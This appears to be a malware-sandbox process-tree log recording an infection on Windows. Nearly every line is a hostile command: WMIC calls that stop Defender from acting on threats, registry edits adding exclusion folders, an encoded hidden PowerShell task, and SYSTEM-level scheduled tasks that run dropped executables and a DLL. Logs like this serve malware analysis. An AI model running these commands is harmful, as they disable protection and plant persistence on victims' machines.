C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:552

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1360

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1616

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:2000

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:864

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1924

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1336

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:588

C:\Windows\system32\taskeng.exe
taskeng.exe {82453773-430C-4A17-AF24-2C35095CE02A} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1932

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\WlwqqkB.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\WlwqqkB.exe nv /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:928

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1916

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1332

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:732

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1736

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:904

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1924

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:984

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1952

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1920

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gggqsyqkI" /SC once /ST 05:07:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:632

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gggqsyqkI"
3⤵
PID:732

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gggqsyqkI"
3⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1672

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1952

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:932

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1700

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:656

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1576

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:812

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\rUaCEWwDdnKMYjxw\rSSlDPsx\nctzyJpLWjQzacgf.wsf"
3⤵
PID:2000

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\rUaCEWwDdnKMYjxw\rSSlDPsx\nctzyJpLWjQzacgf.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:524

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1996

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1252

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1992

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1336

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1776

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:932

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1840

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1844

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1264

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1076

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jrzNdZzegeVMzeqYf" /SC once /ST 03:39:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\bJTzvxo.exe\" gh /site_id 767 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:760

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "jrzNdZzegeVMzeqYf"
3⤵
PID:1840

C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\bJTzvxo.exe
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\bJTzvxo.exe gh /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:848

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:552

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1336

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1776

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1592

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1476

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1996

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1508

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1948

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqZkKdgiyjBiVwZYfn"
3⤵
PID:812

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:588

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
4⤵
PID:1680

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
4⤵
PID:760

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\anjFGKdzU\fIAhcy.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JRajWlGIFNTafba" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1796

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "JRajWlGIFNTafba2" /F /xml "C:\Program Files (x86)\anjFGKdzU\WYUqqKj.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:784

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JRajWlGIFNTafba"
3⤵
PID:1736

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JRajWlGIFNTafba"
3⤵
PID:1524

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qSowRyyhLSmcKu" /F /xml "C:\Program Files (x86)\ELOJFuMDhuHU2\bpgEkhk.xml" /RU "SYSTEM"
3⤵
